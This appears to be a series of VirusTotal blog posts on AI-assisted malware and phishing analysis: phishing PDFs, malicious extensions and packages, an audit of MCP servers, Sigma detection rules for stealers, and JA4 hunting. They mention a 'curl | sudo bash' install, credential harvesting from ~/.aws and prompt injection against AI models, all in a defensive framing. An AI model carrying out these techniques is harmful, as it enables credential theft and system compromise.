PDFs are multi-layered. There’s the object tree (catalog, pages, objects, streams, actions, embedded files) and there’s the visible layer (text/images the user reads). Code Insights analyzes both, then correlates: does the document content, claims, and branding make sense given its internal behaviors? That lets us surface not only classic PDF exploitation (e.g., auto-actions, JS, external launches) but also pure social engineering (phishing, vishing, QR-lures) even when the file has no executable logic. This dual approach allows the AI not only to detect malicious code but also to identify sophisticated scams.

Let's look at real-world samples surfaced by Code Insights during its initial testing phase. We'll start with cases where the PDF contains no malicious code, which traditional engines often miss because there's no executable payload to detect. This is where Code Insights proves useful, identifying clear signs of fraud and social engineering that aim to manipulate the user, not the machine.


Case 1 - Fake debt collection targeting financial fraud

This PDF is a real-world sample sent to VirusTotal and captured by Code Insights during early testing. It was flagged as malicious based entirely on its visible content, without relying on any embedded code or execution logic. The file was marked as clean by all other engines, likely because it contains no scripts, exploits, or embedded payloads.

d92a1a7460c580f8bf6af3cbd39c7840cfe6a146ee15ede8e23c50c2a85becb9

The document pretends to be a debt collection notice from a German agency acting on behalf of Amazon. It includes a formal layout, legal threats, payment instructions, and multiple references to German addresses and regulations. Visually, it looks legitimate.


However, the AI flagged it as fraudulent based on several critical inconsistencies, the most important one being the destination bank account. The payment is requested to an IBAN starting with BG, indicating a Bulgarian account. This contradicts the sender's claimed German identity and would be highly unusual for a legitimate German debt agency. This mismatch alone was enough for Code Insights to classify the file as fraudulent. Additional content cues (urgent tone, fee breakdown, legal pressure) support the assessment.

As described in the Code Insights analysis:

“The visual and textual content confirms the document is a sophisticated phishing attack. It masquerades as an urgent payment demand from a German debt collection agency, supposedly on behalf of Amazon. The document employs high-pressure tactics, including threats of legal action, additional fees, and credit score damage, to compel the recipient to act quickly. The primary and most conclusive indicator of fraud is the demand for payment to a Bulgarian bank account, which is a stark and highly irregular contradiction to the agency's purported German location and registration.”

This is a case where AI adds value by reasoning over the content semantics, not the file structure.


Case 2 - QR-based phishing (quishing) campaign

This is another real-world PDF captured during early testing of Code Insights. At the time of analysis, no antivirus or malware detection engines flagged the file as malicious. The PDF has no embedded scripts, exploits, or execution logic. From a technical perspective, it looks benign.

259e202847d04866acd76427f53bfd9a15372ed6ed56a9e54ba1c62442c945ee

The visible content, however, impersonates an HR notification about a salary increase. It includes multiple social engineering red flags: awkward grammar, lack of personalization, and an irrelevant privacy disclaimer. The only call to action is a QR code, encouraging the recipient to scan it for more details.


Code Insights analyzed and decoded the QR, extracting the hidden URL. The domain is non-corporate and clearly unrelated to HR or payroll systems. The combination of deceptive HR messaging with a QR code that conceals a phishing URL confirms the document is a credential harvesting fraud delivered via PDF.


Case 3 - Vishing via fake PayPal alert

This is another real-world PDF flagged by Code Insights during early evaluation. No antivirus or malware detection engines classified the file as malicious. Structurally, it’s simple and inert: there are no scripts, automatic actions, or embedded links. Minor stream decoding errors are present but considered low-risk anomalies.

d0bedc70085efff5218b901cdaba95d565df867495181544041ba4b8a6019cea


The threat lies entirely in the content. The document impersonates PayPal and trusted brands like Visa to deliver a fake security alert about a high-value unauthorized purchase. The language is urgent and designed to induce panic.

According to Code Insights:

“[...]the visual content of the document is a clear social engineering lure designed for a voice phishing (vishing) attack. [...] The document's sole purpose is to persuade the user to call a specific phone number under the pretense of canceling the fraudulent order. The malicious nature is confirmed by several red flags, including an awkwardly phrased greeting and a phone number with a geographic area code (808) that is deceptively labeled as "Toll-Free." This tactic aims to route the victim to a scammer for social engineering and potential fraud.”


Case 4 - Fake Tax Refund from the Australian Taxation Office

As with previous cases, this PDF wasn’t flagged by any antivirus engine in VirusTotal, but Code Insights identified it as a phishing lure that impersonates the Australian Taxation Office.

b9b763e4b091bc59e9b9f355617622dbabdc1ff2de6707a94ccb26aa7682300e


As described by Code Insights:

“This document is a phishing lure designed to impersonate the Australian Taxation Office (ATO). The visual layer uses an authentic-looking government logo and the promise of a tax refund to entice the recipient into clicking an "Access Document" button. The purpose is to have the user provide an electronic signature for a supposed refund authorization, creating a sense of urgency and financial incentive. The document exhibits multiple red flags common to phishing attacks. These include a generic greeting, a suspicious reference to a .doc file (a common malware vector), instructions that discourage direct replies, and a complete lack of legitimate contact information or alternative methods for verification. The entire premise relies on tricking the user into clicking the button, which likely leads to a malicious website for credential theft or malware download.”


Auto-executing PDF Posing as a Movie Download

Unlike previous examples, this PDF was flagged by 13 antivirus engines in VirusTotal. In this case, the attack is embedded both in the internal structure of the file and its visual appearance. Code Insights correlates these two layers, the technical and the social, to expose the malicious intent.

44e653fe79d1ab160c784c06f4d99def6419e379ef3f802af9f48d595976d2c7


As described by Code Insights:

“The document presents a social engineering lure, masquerading as a download page for pirated movies […] to entice users into clicking links. This theme, centered on illegal content distribution, is a common tactic for malware delivery. Technical analysis of the PDF's internal structure corroborates the malicious intent. The file is configured with an /OpenAction command, a high-risk feature designed to automatically execute an action upon the document being opened […] The combination of a deceptive, high-risk theme with an automatic execution function indicates that the document’s purpose is to compromise the user's system.”

We are actively improving Code Insight based on what we learn from these early cases. PDF is the 6th most common file type submitted to VirusTotal, with around 100,000 new samples uploaded every day. That volume requires us to be strategic: for now, only a selected percentage of PDF files submitted via the public web interface are processed by Code Insight, as we test, tune, and scale the system.

These first results are helping us refine both effectiveness and performance. We’ll continue expanding coverage as we improve detection of threats.

Code Insight Expands to Uncover Risks Across the Software Supply Chain

14 August 2025 at 09:59

When we launched Code Insight, we started by analyzing PowerShell scripts. Since then, we have been continuously expanding its capabilities to cover more file types. Today, we announce that Code Insight can now analyze a broader range of formats crucial to the software supply chain. This includes browser extensions (CRX for Chrome, XPI for Firefox, VSIX for VS Code), software packages (Python Wheel, NPM), and protocols like MCP that enable Large Language Models to interact with external tools.


Audio version of this post, created with NotebookLM Deep Dive

Attackers are increasingly targeting these formats to distribute malware, steal data, or compromise systems. Traditional detection methods, which often rely on signatures or machine learning focused on classification, can struggle to keep up with the dynamic and obfuscated nature of these threats. This is where AI can make a real difference. By analyzing the underlying code logic, Code Insight can identify malicious behavior even in previously unseen threats, providing a deeper level of security analysis.

This is particularly relevant in a landscape where even a single malicious browser extension can lead to significant data breaches, financial loss, or the compromise of corporate networks.


A Viral Tweet and a Real-World Example

In the last few hours, a tweet from a seasoned crypto user (zak.eth) went viral, narrating how his wallet was drained by a malicious extension for the first time in over ten years of activity. This incident is a stark reminder that anyone can be a target.


This is a prime example of where Code Insight can be instrumental. It can analyze one of the suspicious extensions mentioned in the thread and reveal its malicious nature:

From here, we will explore different examples of the new formats supported by Code Insight and specific examples where traditional engines fail to detect a threat.


CRX (Chrome Extensions)

CRX files are the format used for packaging Google Chrome browser extensions. While they can enhance browsing, they also represent an attack vector if they contain malicious code. Here is an example of a seemingly legitimate "Norton Safe Search" extension. However, Code Insight's analysis reveals its true, malicious purpose:

6ca4466baf5ff09bab90a5d06bf113667717400daa59a287393e8f3f10959aba

The extension is obfuscated to hide its true purpose. The code in js/background.js communicates with a command and control (C2) server located at a domain unrelated to Norton. The most critical malicious behavior is its capability to fetch and execute arbitrary code from the C2 server. This allows the attacker to dynamically change the extension's functionality after installation, effectively turning the user's browser into a bot.

In another case, a banking trojan targeting Westpac customers was identified:

34244257f633e104d06b0c4273caca96eb916d26540eeea68495707cbc920bdb

This extension is a banking trojan specifically targeting Westpac customers. It operates as a Man-in-the-Browser (MitB) malware to steal credentials, session data, and funds. It establishes a persistent WebSocket connection to a hardcoded C2 server, collects all cookies from the browser and intercepts form submissions, specifically targeting the input field for the 'AuthorisationCode' (a 2FA/OTP token).


VSIX (Visual Studio Code Extensions)

VSIX files are used for extensions in Visual Studio Code, a popular code editor. Developers can be targeted through these extensions, potentially compromising their development environment and projects.

A deceptive "Zoom" extension for VS Code was found to be stealing user data:

5c89ba9e1bbb7ef869e4553081a40cabbd91a70506d759fd4e97eefb0434c074

The extension attempts to access sensitive user data by reading browser cookies from a known local SQLite database file. It also includes functionality to make external network requests to an unusual domain. which could be used to exfiltrate the collected sensitive data. This combination of local data collection and external communication is an indicator of malicious intent, specifically information theft.


XPI (Firefox Extensions)

XPI files are used for Firefox browser add-ons. Similar to Chrome extensions, they can be used to distribute malware.

A "Mass Tiktok Video Downloader" extension was found to be a phishing and data exfiltration tool:

2c0c8bd05a4942b389feaeb02c372b6443efac9d0931e0bdc602474178b54e7f

It presents a fake Facebook password confirmation popup to phish user credentials. Concurrently, its background script actively collects all browser cookies. All collected data, including the phished passwords, are exfiltrated to a Telegram bot API endpoint.


WHL (Python Wheel)

WHL files are a standard for distributing Python packages. The threats in these examples are not limited to intentionally malicious code, it also includes packages with critical vulnerabilities or insecure coding patterns that can be exploited in supply chain attacks.

An "hh-applicant-tool" designed to interact with an API was found to have a suspicious telemetry feature:

1a168e47cb2d81f54fe504e66e353251a772164959ec71517d2070bf96fee957

It collects data, including vacancy details, employer information, and Google Docs links found in messages, and sends it to a custom server. This communication explicitly disables SSL certificate verification (verify=False), making the data transfer vulnerable to Man-in-the-Middle attacks.

In another instance, a package named "ncatbot" contained a critical security vulnerability:

f2714f6b87689c4d631a587813d14c4e463be7251bf16ff383ad2b7940ca7a4d

A critical security vulnerability exists in the Linux installation process, which executes a remote script with root privileges using curl | sudo bash. This allows for arbitrary code execution and system compromise if the remote script is malicious or its source is compromised.


NPM (Node Package Manager)

NPM is the default package manager for Node.js and is central to the JavaScript ecosystem. Malicious NPM packages are a constant threat to developers and applications.

A package named "serverless-shop-functions" presented as a benign e-commerce application but contained two malicious Python scripts:

8f7a061901c935493e17f3f897a2b98b5ab21350593fda10a6936a84db5b28b7

Backdoor.Python.PolymorphNecro.h is identified as a polymorphic IRC botnet client. Its capabilities include: network sniffing, ARP poisoning, various DDoS attack methods. Main.py is a Discord-controlled Remote Access Trojan (RAT) with extensive capabilities, including: establishing persistence, executing arbitrary PowerShell commands, capturing and exfiltrating screenshots and webcam photos.


PyPI (Python Package Index)

PyPI is the official third-party software repository for Python. It's a common target for attackers looking to distribute malicious packages. However, the threat also comes from packages that, while not intentionally malicious, contain critical vulnerabilities in their design.

A package named python-mcp-client was found to have severe vulnerabilities allowing for remote code execution:

83c4c8d38e3eea555666e26ed85953b7479d46d9b4d2c12c521ae5f505b343d2

The package exposes severe vulnerabilities that allow for remote code execution (RCE) and arbitrary file system operations. The flask_app.py component allows users to dynamically add new MCP servers via the /api/add_server endpoint. This endpoint directly accepts user-provided command and args parameters, enabling an attacker to execute arbitrary shell commands on the host system.

By expanding Code Insight's capabilities, we aim to provide the cybersecurity community with a tool to better understand and mitigate the evolving threats within the software supply chain. Stay tuned as we continue to enhance our platform to counter new attack vectors.

YARA-X 1.0.0: The Stable Release and Its Advantages

4 June 2025 at 21:49

Short note for everyone who already lives and breathes YARA:

Victor (aka plusvic) just launched YARA-X 1.0.0. Full details: https://virustotal.github.io/yara-x/blog/yara-x-is-stable/


Audio version of this post, created with NotebookLM Deep Dive

What changes for you

Area
YARA 4.x
YARA-X
Engine C/C++, manual memory Rust, memory-safe
Rule compatibility ~99 % work as-is
Speed (regex / loops) Can bottleneck scans Often 5–10× faster
Error messages Generic Line-accurate, clearer
CLI Plain text Colour, JSON/YAML dump, shell completion
Future work Bug-fix only New features land here


Why move now

  • Performance – heavy rules (large regex, deep loops) finish seconds faster.
  • Safety – Rust core avoids the usual memory bugs and makes crashes rare.
  • Maintainability – parser and scanner are decoupled; easier to embed or extend.
  • Better tooling – built-in formatter (yara-x fmt), linter-friendly output.
  • Active roadmap – new language features will go to YARA-X only.

We already use YARA-X at VirusTotal for Livehunt and Retrohunt. Billions of files later, it behaves.

Give it a spin, report issues, and send feedback our way. Huge thanks to Victor for pushing the project this far. Let’s keep making pattern matching simpler and faster

.

What 17,845 GitHub Repos Taught Us About Malicious MCP Servers

4 June 2025 at 10:58

Spoiler: VirusTotal Code Insight’s preliminary audit flagged nearly 8% of MCP (Model Context Protocol) servers on GitHub as potentially forged for evil, though the sad truth is, bad intentions aren’t required to follow bad practices and publish code with critical vulnerabilities.


Audio version of this post, created with NotebookLM Deep Dive

Before we get started, a quick personal note. A couple of weeks ago, I announced at Google that I’m stepping away from my role as a manager of managers and getting back to my roots, focusing on the VirusTotal community. And I’m not doing it alone. I’m joined by some legendary names from the project’s early days, like Julio, the very first VirusTotal developer and Víctor, creator of YARA and YARA-X. In this new chapter, we’re going deep into AI, not just evolving VT and using it to analyze typical threats but also to hunt down the new ones riding the AI wave, like malicious models and MCPs among others.

As many of you already know, MCP (Model Context Protocol) is a simple but powerful standard that lets large language models interact with external tools and APIs via JSON-RPC. Think of it as a universal adapter, MCP turns scripts, services, and data sources into callable functions that models like Claude, GPT or Gemini can use to answer complex queries or automate tasks. In just a few months, MCP has gone from niche to near-standard with native support across most major LLM platforms.

Before building and releasing our own MCP server for VirusTotal (which is coming very soon) we wanted to take a step back and understand how this protocol is being used in the wild. Specifically: are people already abusing it to build malicious plugins? And if so, how could we detect and classify these threats inside VT?

With that in mind, I set out to run a quick three-phase experiment (aka three humble python scripts). First, a harvesting phase to collect as many GitHub projects as possible by querying the API for MCP-related keywords like “model-context-protocol”, “server_mcp” or “define_mcp_tool”, among others. Then came a filtering step to isolate the interesting repos, not everything with "MCP" in the README is a real server implementation, so I built a scoring system to identify true servers based on dependency files, import statements, keywords in code, presence of mcp.json, and more. After applying that filter, we ended up with a focused dataset of 17,845 likely MCP server projects.

Finally, as the third phase, we ran a security review using VT Code Insight powered by Gemini 2.5 Flash and taking advantage of its 1-million token context window, speed, and code analysis skills to evaluate each project as a whole. We asked Code Insight for a basic verdict and to flag any High, Medium, or Low vulnerabilities. But after just a few hundred analyses we had to hit pause, Code Insight was surfacing so many issues that the results quickly became overwhelming. So we tightened things up with a second and more focused prompt, asking Code Insight to look specifically for signs of intentional malicious behavior along with reasoning that supported a conclusion of malice.

We let the new prompt run on the full dataset and Code Insight got to work. In the end, it marked 1,408 repositories as likely designed to be malicious. After checking some of these results by hand, two things were clear to me. First: there are many possible attack vectors that can be used through an MCP server. And second: Code Insight seems to trust human developers too much, it often assumes that some bad practices and the resulting critical bugs couldn’t be accidental.

“This pattern—creating a powerful, remotely triggerable code execution vulnerability and simultaneously preparing a collection of sensitive data (including data not needed for normal operation)—is characteristic of an intentional backdoor designed for data exfiltration and system compromise. The dynamic tool generation serves as a plausible cover for the unsafe use of `exec`.” Oh, Code Insight… if only you knew the kind of chaos vibe coding is causing. We’re going to be very busy in cybersecurity cleaning up after these accidental masterpieces

We’ve confirmed some of the flagged projects were just proof-of-concepts and security researcher demos, and many tiny “hello-world” examples were missing basic security features which Code Insight called out as “likely malicious”, because no sane developer would ship that to production. But even if you filter out the hobby projects, there’s still a scary amount of real attack vectors and critical vulnerabilities out there.

While we continue manually reviewing Code Insight’s reports to learn more about the issues and weak spots it uncovered, we also asked Gemini 2.5 Flash to help us categorize them. We provided it with the problem summaries from the 1,408 MCP-related repositories flagged as potentially problematic, and asked for a simple list, just a brief enumeration of the attack techniques involved. Gemini came back with the following list:

Attack vector Example Indicators
Malicious-Server Supply Chain Self-update scripts, install hooks from non-canonical URLs, latest tag pulls.
Rogue Server / Impersonation Hard-coded IPs or typo-squatted domains, no TLS/mTLS verification.
Credential Harvesting Code that reads ~/.aws, Keychain, or env vars and posts to external endpoint.
Tool-Based RCE & File Ops subprocess, exec, or rm -rf paths built from LLM/user input.
Server-Side Command Injection Server concatenates JSON-RPC params into shell/SQL without escaping.
Semantic-Gap Poisoning Manifest says “read-only”; implementation writes files or opens sockets.
Over-broad Permissions OAuth scopes * / “full_access”, multiple data silos bridged in one tool.
Indirect Prompt Injection HTML comments, zero-width chars, or Base64 blobs returned to the host.
Context/Data Poisoning Unvalidated web-scrape fed straight into context= parameter.
Sampling-Feature Abuse Server requests giant completions before any other call; leaks system prompt.
Living-Off-The-Land Malicious server does nothing but orchestrate trusted tools already installed.
Chained MCP Exploitation Output from Server A becomes params for Server B within one loop.
Financial-Fraud Tools / DoS / Persistence Payment APIs with LLM-supplied dest-IDs, infinite loops without rate limits, hot-swapped binaries.

If you're building or defending around MCPs, there are a few quick wins to keep things safer:

  • treat MCP servers like browser extensions (sign, hash, and pin specific versions)
  • isolate them in containers or WASM sandboxes with strict file and network limits
  • make permissions visible and revocable through a clear, zero-trust-style UI
  • and never let model outputs go unfiltered, strip out sneaky stuff like invisible characters, HTML comments, or rogue script tags before looping anything back into your LLM.

MCPs are growing fast (almost 18,000 servers already in the wild), and with that growth comes a mountain of security debt. The good news? We’ll soon be launching a dedicated feature in VirusTotal to analyze MCP servers.
Stay tuned… we’re just getting started

Research that builds detections

9 January 2025 at 09:51
Note: You can view the full content of the blog here.

Introduction

Detection engineering is becoming increasingly important in surfacing new malicious activity. Threat actors might take advantage of previously unknown malware families - but a successful detection of certain methodologies or artifacts can help expose the entire infection chain.
In previous blog posts, we announced the integration of Sigma rules for macOS and Linux into VirusTotal, as well as ways in which Sigma rules can be converted to YARA to take advantage of VirusTotal Livehunt capabilities. In this post, we will show different approaches to hunt for interesting samples and derive new Sigma detection opportunities based on their behavior.

Tell me what role you have and I'll tell you how you use VirusTotal

VirusTotal is a really useful tool that can be used in many different ways. We have seen how people from SOCs and Incident Response teams use it (in fact, we have our VirusTotal Academy videos for SOCs and IRs teams), and we have also shown how those who hunt for threats or analyze those threats can use it too.
But there's another really cool way to use VirusTotal - for people who build detections and those who are doing research. We want to show everyone how we use VirusTotal in our work. Hopefully, this will be helpful and also give people ideas for new ways to use it themselves.
To explain our process, we used examples of Lummac and VenomRAT samples that we found in recent campaigns. These caught our attention due to some behaviors that had not been identified by public detection rules in the community. For that reason we have created two Sigma rules to share with the community, but if you want to get all the details about how we identified it and started our research, go to our Google Threat Intelligence community blog.

Our approach

As detection engineers, it is important to look for techniques that can be in use by multiple threat actors - as this makes tracking malicious activity more efficient. Prior to creating those detections, it is best to check existing research and rule collections, such as the Sigma rules repository. This can save time and effort, as well as provide insight into previously observed samples that can be further researched.
A different approach would be to instead look for malicious files that are not detected by existing Sigma rules, since they can uncover novel methodologies and provide new opportunities for detection creation.
One approach is to hunt for files that are flagged by at least five different AV vendors, were recently uploaded within the last month, have sandbox execution (in order to view their behavior), and which have not triggered any Crowdsourced Sigma rules.
p:5+ have:behavior fs:30d+ not have:sigma
This initial query can be adapted to incorporate additional filters that the researcher may find relevant. These could include modifiers to identify for example, the presence of the PowerShell process in the list of executed processes (behavior_created_processes:powershell.exe), filtering results to only include documents (type:document), or identifying communication with services like Pastebin (behavior_network:pastebin.com).
Another way to go is to look at files that have been flagged by at least five AV’s and were tested in either Zenbox or CAPE. These sandboxes often have great logs produced by Sysmon, which are really useful for figuring out how to spot these threats. Again, we'd want to focus on files uploaded in the last month that haven't triggered any Sigma rules. This gives us a good starting point for building new detection rules.
p:5+ (sandbox_name:"CAPE Sandbox" or sandbox_name:"Zenbox") fs:30d+ not have:sigma
Lastly, another idea is to look for files that have not triggered many high severity detections from the Sigma Crowdsourced rules, as these can be more evasive. Specifically, we will look for samples with zero critical, high or medium alerts - and no more than two low severity ones.
p:5+ have:behavior fs:30d+ sigma_critical:0 sigma_high:0 sigma_medium:0 sigma_low:2-
With these queries, we can start investigating some samples that may be interesting to create detection rules.

Our detections for the community

Our approach helps us identify behaviors that seem interesting and worth focusing on. In our blog, where we explain this approach in detail, we highlighted two campaigns linked to Lummac and VenomRAT that exhibited interesting activity. Because of this, we decided to share the Sigma rules we developed for these campaigns. Both rules have been published in Sigma's official repository for the community.

Detect The Execution Of More.com And Vbc.exe Related to Lummac Stealer

title: Detect The Execution Of More.com And Vbc.exe Related to Lummac Stealer
  id: 19b3806e-46f2-4b4c-9337-e3d8653245ea
  status: experimental
  description: Detects the execution of more.com and vbc.exe in the process tree. This behaviors was observed by a set of samples related to Lummac Stealer. The Lummac payload is injected into the vbc.exe process.
  references:
      - https://www.virustotal.com/gui/file/14d886517fff2cc8955844b252c985ab59f2f95b2849002778f03a8f07eb8aef
      - https://strontic.github.io/xcyclopedia/library/more.com-EDB3046610020EE614B5B81B0439895E.html
      - https://strontic.github.io/xcyclopedia/library/vbc.exe-A731372E6F6978CE25617AE01B143351.html
  author: Joseliyo Sanchez, @Joseliyo_Jstnk
  date: 2024-11-14
  tags:
      - attack.defense-evasion
      - attack.t1055
  logsource:
      category: process_creation
      product: windows
  detection:
      # VT Query: behaviour_processes:"C:\\Windows\\SysWOW64\\more.com" behaviour_processes:"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe"
      selection_parent:
          ParentImage|endswith: '\more.com'
      selection_child:
          - Image|endswith: '\vbc.exe'
          - OriginalFileName: 'vbc.exe'
      condition: all of selection_*
  falsepositives:
      - Unknown
  level: high

Sysmon event for: Detect The Execution Of More.com And Vbc.exe Related to Lummac Stealer

{
  "System": {
    "Provider": {
      "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
      "Name": "Microsoft-Windows-Sysmon"
    },
    "EventID": 1,
    "Version": 5,
    "Level": 4,
    "Task": 1,
    "Opcode": 0,
    "Keywords": "0x8000000000000000",
    "TimeCreated": {
      "SystemTime": "2024-11-26T16:23:05.132539500Z"
    },
    "EventRecordID": 692861,
    "Correlation": {},
    "Execution": {
      "ProcessID": 2396,
      "ThreadID": 3116
    },
    "Channel": "Microsoft-Windows-Sysmon/Operational",
    "Computer": "DESKTOP-B0T93D6",
    "Security": {
      "UserID": "S-1-5-18"
    }
  },
  "EventData": {
    "RuleName": "-",
    "UtcTime": "2024-11-26 16:23:05.064",
    "ProcessGuid": "{C784477D-F5E9-6745-6006-000000003F00}",
    "ProcessId": 4184,
    "Image": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe",
    "FileVersion": "14.8.3761.0",
    "Description": "Visual Basic Command Line Compiler",
    "Product": "Microsoft® .NET Framework",
    "Company": "Microsoft Corporation",
    "OriginalFileName": "vbc.exe",
    "CommandLine": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\vbc.exe",
    "CurrentDirectory": "C:\\Users\\george\\AppData\\Roaming\\comlocal\\RUYCLAXYVMFJ\\",
    "User": "DESKTOP-B0T93D6\\george",
    "LogonGuid": "{C784477D-9D9B-66FF-6E87-050000000000}",
    "LogonId": "0x5876e",
    "TerminalSessionId": 1,
    "IntegrityLevel": "High",
    "Hashes": {
      "SHA1": "61F4D9A9EE38DBC72E840B3624520CF31A3A8653",
      "MD5": "FCCB961AE76D9E600A558D2D0225ED43",
      "SHA256": "466876F453563A272ADB5D568670ECA98D805E7ECAA5A2E18C92B6D3C947DF93",
      "IMPHASH": "1460E2E6D7F8ECA4240B7C78FA619D15"
    },
    "ParentProcessGuid": "{C784477D-F5D4-6745-5E06-000000003F00}",
    "ParentProcessId": 6572,
    "ParentImage": "C:\\Windows\\SysWOW64\\more.com",
    "ParentCommandLine": "C:\\Windows\\SysWOW64\\more.com",
    "ParentUser": "DESKTOP-B0T93D6\\george"
  }
} 

File Creation Related To RAT Clients

title: File Creation Related To RAT Clients
  id: 2f3039c8-e8fe-43a9-b5cf-dcd424a2522d
  status: experimental
  description: File .conf created related to VenomRAT, AsyncRAT and Lummac samples observed in the wild.
  references:
      - https://www.virustotal.com/gui/file/c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
      - https://www.virustotal.com/gui/file/e96a0c1bc5f720d7f0a53f72e5bb424163c943c24a437b1065957a79f5872675
  author: Joseliyo Sanchez, @Joseliyo_Jstnk
  date: 2024-11-15
  tags:
      - attack.execution
  logsource:
      category: file_event
      product: windows
  detection:
      # VT Query: behaviour_files:"\\AppData\\Roaming\\DataLogs\\DataLogs.conf"
      # VT Query: behaviour_files:"DataLogs.conf" or behaviour_files:"hvnc.conf" or behaviour_files:"dcrat.conf"
      selection_required:
          TargetFilename|contains: '\AppData\Roaming\'
      selection_variants:
          TargetFilename|endswith:
              - '\datalogs.conf'
              - '\hvnc.conf'
              - '\dcrat.conf'
          TargetFilename|contains:
              - '\mydata\'
              - '\datalogs\'
              - '\hvnc\'
              - '\dcrat\'
      condition: all of selection_*
  falsepositives:
      - Legitimate software creating a file with the same name
  level: high

Sysmon event for: File Creation Related To RAT Clients

{
  "System": {
    "Provider": {
      "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}",
      "Name": "Microsoft-Windows-Sysmon"
    },
    "EventID": 11,
    "Version": 2,
    "Level": 4,
    "Task": 11,
    "Opcode": 0,
    "Keywords": "0x8000000000000000",
    "TimeCreated": {
      "SystemTime": "2024-12-02T00:52:23.072811600Z"
    },
    "EventRecordID": 1555690,
    "Correlation": {},
    "Execution": {
      "ProcessID": 2624,
      "ThreadID": 3112
    },
    "Channel": "Microsoft-Windows-Sysmon/Operational",
    "Computer": "DESKTOP-B0T93D6",
    "Security": {
      "UserID": "S-1-5-18"
    }
  },
  "EventData": {
    "RuleName": "-",
    "UtcTime": "2024-12-02 00:52:23.059",
    "ProcessGuid": "{C784477D-04C6-674D-5C06-000000004B00}",
    "ProcessId": 7592,
    "Image": "C:\\Users\\george\\Desktop\\ezzz.exe",
    "TargetFilename": "C:\\Users\\george\\AppData\\Roaming\\MyData\\DataLogs.conf",
    "CreationUtcTime": "2024-12-02 00:52:23.059",
    "User": "DESKTOP-B0T93D6\\george"
  }

Wrapping up

Detection engineering teams can proactively create new detections by hunting for samples that are being distributed and uploaded to our platform. Applying our approach can benefit in the development of detection on the latest behaviors that do not currently have developed detection mechanisms. This could potentially help organizations be proactive in creating detections based on threat hunting missions.
The Sigma rules created to detect Lummac activity have been used during threat hunting missions to identify new samples of this family in VirusTotal. Another use is translating them into the language of the SIEM or EDR available in the infrastructure, as they could help identify potential behaviors related to Lummac samples observed in late 2024. After passing quality controls and being published on Sigma's public GitHub, they have been integrated for use in VirusTotal, delivering the expected results. You can use them in the following way:
Lummac Stealer Activity - Execution Of More.com And Vbc.exe
sigma_rule:a1021d4086a92fd3782417a54fa5c5141d1e75c8afc9e73dc6e71ef9e1ae2e9c
File Creation Related To RAT Clients
sigma_rule:8f179585d5c1249ab1ef8cec45a16d112a53f91d143aa2b0b6713602b1d19252
We hope you found this blog interesting and useful, and as always we are happy to hear your feedback.

Important Update: IP Address Change for VirusTotal

12 November 2024 at 11:43

We're making a change to the IP address for www.virustotal.com. If you're currently whitelisting our IP address in your firewall or proxy, you'll need to update your rules to maintain access to VirusTotal.

Starting November 25th, we'll be gradually transitioning the resolution of www.virustotal.com to a new IP address: 34.54.88.138. If you have hardcoded the previous IP address (74.125.34.46) in your firewall or proxy, you'll need to update your configuration to include the new IP address. This will ensure continued access to VirusTotal.

TLS Certificate provider change:

We're also updating our TLS certificate provider, moving from a DigiCert wildcard certificate to Google Trust Services single-host certificate. While this change should be seamless for most users, you'll need to update your configuration if you validate the certificate's signer or subject.

Note for Big Files API Users:

If you use the Big Files endpoint (https://docs.virustotal.com/reference/files-upload-url) for submitting files larger than 32MB, remember that it provides a URL pointing to the bigfiles.virustotal.com domain.

This domain is managed by a ghs.googlehosted.com load balancer, which uses dynamic IP address resolution. Please ensure your firewall rules can accommodate this.

We'll be implementing this change gradually starting on November 25th to minimize any potential disruption.

We understand that this change may require adjustments to your systems, and we appreciate your prompt attention to this matter. If you have any questions or concerns, please don't hesitate to contact us.

Unveiling Hidden Connections: JA4 Client Fingerprinting on VirusTotal

18 October 2024 at 11:48
VirusTotal has incorporated a powerful new tool to fight against malware: JA4 client fingerprinting. This feature allows security researchers to track and identify malicious files based on the unique characteristics of their TLS client communications.

JA4: A More Robust Successor to JA3

JA4, developed by FoxIO, represents a significant advancement over the older JA3 fingerprinting method. JA3's effectiveness had been hampered by the increasing use of TLS extension randomization in https clients, which made fingerprints less consistent. JA4 was specifically designed to be resilient to this randomization, resulting in more stable and reliable fingerprints.

Unveiling the Secrets of the Client Hello

JA4 fingerprinting focuses on analyzing the TLS Client Hello packet, which is sent unencrypted from the client to the server at the start of a TLS connection. This packet contains a treasure trove of information that can uniquely identify the client application or its underlying TLS library. Some of the key elements extracted by JA4 include:
  • TLS Version: The version of TLS supported by the client.
  • Cipher Suites: The list of cryptographic algorithms the client can use.
  • TLS Extensions: Additional features and capabilities supported by the client.
  • ALPN (Application-Layer Protocol Negotiation): The application-level protocol, such as HTTP/2 or HTTP/3, that the client wants to use after the TLS handshake.

JA4 in Action: Pivoting and Hunting on VirusTotal

VirusTotal has integrated JA4 fingerprinting into its platform through the behavior_network file search modifier. This allows analysts to quickly discover relationships between files based on their JA4 fingerprints.

To find the JA4 value, navigate to the "behavior" section of the desired sample and locate the TLS subsection. In addition to JA4, you might also find JA3 or JA3S there.

Example Search: Let's say you've encountered a suspicious file that exhibits the JA4 fingerprint "t10d070600_c50f5591e341_1a3805c3aa63" during VirusTotal's behavioral analysis.

You can click on this JA4 to pivot using the search query behavior_network:t10d070600_c50f5591e341_1a3805c3aa63 finding other files with the same fingerprint This search will pivot you to additional samples that share the same JA4 fingerprint, suggesting they might be related. This could indicate that these files are part of the same malware family or share a common developer or simply share a common TLS library.

Wildcard Searches

To broaden your search, you can use wildcards within the JA4 hash. For instance, the search: behaviour_network:t13d190900_*_97f8aa674fd9

Returns files that match the JA4_A and JA4_C components of the JA4 hash while allowing for variations in the middle section, which often corresponds to the cipher suite. This technique is useful for identifying files that might use different ciphers but share other JA4 characteristics.

YARA Hunting Rules: Automating JA4-Based Detection

YARA hunting rules using the "vt" module can be written to automatically detect files based on their JA4 fingerprints. Here's an example of a YARA rule that targets a specific JA4 fingerprint:


This rules will flag any file submitted to VirusTotal that exhibits the matching JA4 fingerprint. The first example only matches "t12d190800_d83cc789557e_7af1ed941c26" during behavioral analysis. The second rule will match a regular expression /t10d070600_.*_1a3805c3aa63/, only matching JA4_A and JA4_C components, excluding the JA4_B cipher suite. These fingerprints could be linked to known malware, a suspicious application, or any TLS client behavior that is considered risky by security analysts.



